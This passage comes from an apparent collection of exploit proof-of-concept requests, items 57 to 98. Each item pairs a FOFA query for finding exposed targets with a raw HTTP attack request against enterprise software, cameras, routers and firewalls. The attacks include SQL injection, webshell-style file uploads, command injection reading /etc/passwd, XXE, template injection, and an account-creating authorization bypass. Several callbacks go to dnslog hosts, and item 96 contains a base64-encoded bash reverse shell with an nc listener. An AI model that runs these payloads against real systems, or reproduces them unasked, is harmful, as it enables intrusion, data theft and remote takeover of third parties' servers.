        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通 T+ KeyInfoList.aspx SQL injection
FOFA: app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response containing the string 6cfe798ba8e5b85feb50164c59f4bec9 confirm that the vulnerability exists.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the path it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is then reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 campus mobile service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 operations management center session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi-Anxin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
